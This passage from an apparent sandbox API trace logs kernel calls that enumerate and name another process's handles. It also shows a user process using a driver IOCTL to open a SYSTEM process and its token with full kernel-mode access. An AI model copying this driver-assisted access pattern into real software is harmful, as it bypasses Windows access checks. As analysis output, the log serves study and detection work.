PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.954] PsAcquireProcessExitSynchronization () returned 0x0 [0289.954] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.954] ObReferenceObjectByHandle (in: Handle=0x30c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069873620, HandleInformation=0x0) returned 0x0 [0289.954] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.954] PsReleaseProcessExitSynchronization () returned 0x2 [0289.954] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48007 [0289.954] ObQueryNameString (in: Object=0xffffe0006901cc00, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.954] ObfDereferenceObject (Object=0xffffe00069873620) returned 0x7ffd [0289.954] IoCompleteRequest () returned 0x0 [0289.954] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.954] PsAcquireProcessExitSynchronization () returned 0x0 [0289.954] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.955] ObReferenceObjectByHandle (in: Handle=0x310, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699a83a0, HandleInformation=0x0) returned 0x0 [0289.955] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.955] PsReleaseProcessExitSynchronization () returned 0x2 [0289.955] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48006 [0289.955] ObQueryNameString (in: Object=0xffffe00069983580, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.955] ObfDereferenceObject (Object=0xffffe000699a83a0) returned 0x7ff1 [0289.955] IoCompleteRequest () returned 0x0 [0289.955] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.955] PsAcquireProcessExitSynchronization () returned 0x0 [0289.955] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.955] ObReferenceObjectByHandle (in: Handle=0x31c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699b68d0, HandleInformation=0x0) returned 0x0 [0289.955] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.955] PsReleaseProcessExitSynchronization () returned 0x2 [0289.955] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48005 [0289.955] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.955] ObfDereferenceObject (Object=0xffffe000699b68d0) returned 0x7fff [0289.955] IoCompleteRequest () returned 0x0 [0289.955] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.955] PsAcquireProcessExitSynchronization () returned 0x0 [0289.955] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.955] ObReferenceObjectByHandle (in: Handle=0x334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699b5520, HandleInformation=0x0) returned 0x0 [0289.955] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.955] PsReleaseProcessExitSynchronization () returned 0x2 [0289.955] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48004 [0289.955] ObQueryNameString (in: Object=0xffffe000699b5520, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.955] ObfDereferenceObject (Object=0xffffe000699b5520) returned 0x7f53 [0289.955] IoCompleteRequest () returned 0x0 [0289.955] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.955] PsAcquireProcessExitSynchronization () returned 0x0 [0289.955] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.955] ObReferenceObjectByHandle (in: Handle=0x424, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a81f20, HandleInformation=0x0) returned 0x0 [0289.955] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.955] PsReleaseProcessExitSynchronization () returned 0x2 [0289.955] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48003 [0289.956] ObQueryNameString (in: Object=0xffffe00069a81f20, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.956] ObfDereferenceObject (Object=0xffffe00069a81f20) returned 0x800e [0289.956] IoCompleteRequest () returned 0x0 [0289.956] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.956] PsAcquireProcessExitSynchronization () returned 0x0 [0289.956] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.956] ObReferenceObjectByHandle (in: Handle=0x480, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a9dd00, HandleInformation=0x0) returned 0x0 [0289.956] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.956] PsReleaseProcessExitSynchronization () returned 0x2 [0289.956] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48002 [0289.956] ObQueryNameString (in: Object=0xffffe00069a9dd00, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.956] ObfDereferenceObject (Object=0xffffe00069a9dd00) returned 0x7f77 [0289.956] IoCompleteRequest () returned 0x0 [0289.956] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.956] PsAcquireProcessExitSynchronization () returned 0x0 [0289.956] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.956] ObReferenceObjectByHandle (in: Handle=0x5dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b0aa50, HandleInformation=0x0) returned 0x0 [0289.956] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.956] PsReleaseProcessExitSynchronization () returned 0x2 [0289.956] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48001 [0289.956] ObQueryNameString (in: Object=0xffffe00069b0aa50, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.956] ObfDereferenceObject (Object=0xffffe00069b0aa50) returned 0x7ffd [0289.956] IoCompleteRequest () returned 0x0 [0289.956] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.956] PsAcquireProcessExitSynchronization () returned 0x0 [0289.956] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.956] ObReferenceObjectByHandle (in: Handle=0x628, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b0ba60, HandleInformation=0x0) returned 0x0 [0289.956] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.956] PsReleaseProcessExitSynchronization () returned 0x2 [0289.956] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48000 [0289.956] ObQueryNameString (in: Object=0xffffe00069b0ba60, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.956] ObfDereferenceObject (Object=0xffffe00069b0ba60) returned 0x7ff4 [0289.956] IoCompleteRequest () returned 0x0 [0289.957] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.957] PsAcquireProcessExitSynchronization () returned 0x0 [0289.957] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.957] ObReferenceObjectByHandle (in: Handle=0x658, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b0e8b0, HandleInformation=0x0) returned 0x0 [0289.957] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.957] PsReleaseProcessExitSynchronization () returned 0x2 [0289.957] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x47fff [0289.957] ObQueryNameString (in: Object=0xffffe00069b0e8b0, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.957] ObfDereferenceObject (Object=0xffffe00069b0e8b0) returned 0x7fd4 [0289.957] IoCompleteRequest () returned 0x0 [0289.957] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.957] PsAcquireProcessExitSynchronization () returned 0x0 [0289.957] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.957] ObReferenceObjectByHandle (in: Handle=0x88c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069323d20, HandleInformation=0x0) returned 0x0 [0289.957] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.957] PsReleaseProcessExitSynchronization () returned 0x2 [0289.957] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x47ffe [0289.957] ObQueryNameString (in: Object=0xffffe00069323d20, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.957] ObfDereferenceObject (Object=0xffffe00069323d20) returned 0x7ffe [0289.957] IoCompleteRequest () returned 0x0 [0289.957] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.957] PsAcquireProcessExitSynchronization () returned 0x0 [0289.957] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.957] ObReferenceObjectByHandle (in: Handle=0x89c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a31a410, HandleInformation=0x0) returned 0x0 [0289.957] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.957] PsReleaseProcessExitSynchronization () returned 0x2 [0289.957] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x47ffd [0289.957] ObQueryNameString (in: Object=0xffffe0006a31a410, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.957] ObfDereferenceObject (Object=0xffffe0006a31a410) returned 0x7ffe [0289.957] IoCompleteRequest () returned 0x0 [0289.957] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.957] PsAcquireProcessExitSynchronization () returned 0x0 [0289.957] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.958] ObReferenceObjectByHandle (in: Handle=0x8c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691634c0, HandleInformation=0x0) returned 0x0 [0289.958] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.958] PsReleaseProcessExitSynchronization () returned 0x2 [0289.958] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x47ffc [0289.958] ObQueryNameString (in: Object=0xffffe000691634c0, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.958] ObfDereferenceObject (Object=0xffffe000691634c0) returned 0x7ff7 [0289.958] IoCompleteRequest () returned 0x0 [0289.958] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.958] PsAcquireProcessExitSynchronization () returned 0x0 [0289.958] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.958] ObReferenceObjectByHandle (in: Handle=0x8e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4a8090, HandleInformation=0x0) returned 0x0 [0289.958] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.958] PsReleaseProcessExitSynchronization () returned 0x2 [0289.958] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x47ffb [0289.958] ObQueryNameString (in: Object=0xffffe0006a4a8090, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.958] ObfDereferenceObject (Object=0xffffe0006a4a8090) returned 0x7ffa [0289.958] IoCompleteRequest () returned 0x0 [0289.958] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.958] PsAcquireProcessExitSynchronization () returned 0x0 [0289.958] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.958] ObReferenceObjectByHandle (in: Handle=0x8f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a790cd0, HandleInformation=0x0) returned 0x0 [0289.958] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.958] PsReleaseProcessExitSynchronization () returned 0x2 [0289.958] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x47ffa [0289.958] ObQueryNameString (in: Object=0xffffe00072a93060, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.958] ObfDereferenceObject (Object=0xffffe0006a790cd0) returned 0x7fef [0289.958] IoCompleteRequest () returned 0x0 [0289.958] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.958] PsAcquireProcessExitSynchronization () returned 0x0 [0289.958] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.958] ObReferenceObjectByHandle (in: Handle=0x900, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4c19f0, HandleInformation=0x0) returned 0x0 [0289.958] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.958] PsReleaseProcessExitSynchronization () returned 0x2 [0289.958] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x47ff9 [0289.959] ObQueryNameString (in: Object=0xffffe0006a4c19f0, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.959] ObfDereferenceObject (Object=0xffffe0006a4c19f0) returned 0x7ff7 [0289.959] IoCompleteRequest () returned 0x0 [0289.959] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.959] PsAcquireProcessExitSynchronization () returned 0x0 [0289.959] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.959] ObReferenceObjectByHandle (in: Handle=0x904, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a8f3cd0, HandleInformation=0x0) returned 0x0 [0289.959] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.959] PsReleaseProcessExitSynchronization () returned 0x2 [0289.959] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x47ff8 [0289.959] ObQueryNameString (in: Object=0xffffe00072a93060, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.959] ObfDereferenceObject (Object=0xffffe0006a8f3cd0) returned 0x7fef [0289.959] IoCompleteRequest () returned 0x0 [0289.959] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.959] PsAcquireProcessExitSynchronization () returned 0x0 [0289.959] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.959] ObReferenceObjectByHandle (in: Handle=0x928, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a7d8f20, HandleInformation=0x0) returned 0x0 [0289.959] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.959] PsReleaseProcessExitSynchronization () returned 0x2 [0289.959] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x47ff7 [0289.959] ObQueryNameString (in: Object=0xffffe00072a93060, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.959] ObfDereferenceObject (Object=0xffffe0006a7d8f20) returned 0x7ff0 [0289.959] IoCompleteRequest () returned 0x0 [0289.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x140) returned 0x188 [0289.959] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.959] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006993e080, HandleInformation=0x0) returned 0x0 [0289.959] ObOpenObjectByPointer (in: Object=0xffffe0006993e080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0289.959] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4800d [0289.959] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe000738dc100 | out: TokenHandle=0xffffe000738dc100*=0x18c) returned 0x0 [0289.959] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0289.959] IoCompleteRequest () returned 0x0 [0289.960] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0289.960] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0289.960] CloseHandle (hObject=0x18c) returned 1 [0289.960] CloseHandle (hObject=0x188) returned 1 [0289.960] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.960] PsAcquireProcessExitSynchronization () returned 0x0 [0289.960] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.961] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006993f8f0, HandleInformation=0x0) returned 0x0 [0289.961] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.961] PsReleaseProcessExitSynchronization () returned 0x2 [0289.961] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4000b [0289.961] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.961] ObfDereferenceObject (Object=0xffffe0006993f8f0) returned 0x7ffe [0289.961] IoCompleteRequest () returned 0x0 [0289.961] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.961] PsAcquireProcessExitSynchronization () returned 0x0 [0289.961] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.961] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069941b10, HandleInformation=0x0) returned 0x0 [0289.961] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.961] PsReleaseProcessExitSynchronization () returned 0x2 [0289.961] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4000a [0289.961] ObQueryNameString (in: Object=0xffffe00069941b10, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.961] ObfDereferenceObject (Object=0xffffe00069941b10) returned 0x7ffe [0289.961] IoCompleteRequest () returned 0x0 [0289.961] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.961] PsAcquireProcessExitSynchronization () returned 0x0 [0289.961] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.961] ObReferenceObjectByHandle (in: Handle=0xb0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069945580, HandleInformation=0x0) returned 0x0 [0289.961] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.961] PsReleaseProcessExitSynchronization () returned 0x2 [0289.961] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40009 [0289.961] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a6dd7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6dd7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.961] ObfDereferenceObject (Object=0xffffe00069945580) returned 0x7ffc [0289.961] IoCompleteRequest () returned 0x0 [0289.961] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.961] PsAcquireProcessExitSynchronization () returned 0x0 [0289.961] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.961] ObReferenceObjectByHandle (in: Handle=0x130, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069963e40, HandleInformation=0x0) returned 0x0 [0289.961] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.961] PsReleaseProcessExitSynchronization () returned 0x2 [0289.961] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40008 [0289.961] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a5067c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5067c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.962] ObfDereferenceObject (Object=0xffffe00069963e40) returned 0x7ffd [0289.962] IoCompleteRequest () returned 0x0 [0289.962] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.962] PsAcquireProcessExitSynchronization () returned 0x0 [0289.962] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.962] ObReferenceObjectByHandle (in: Handle=0x18c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000696e1890, HandleInformation=0x0) returned 0x0 [0289.962] 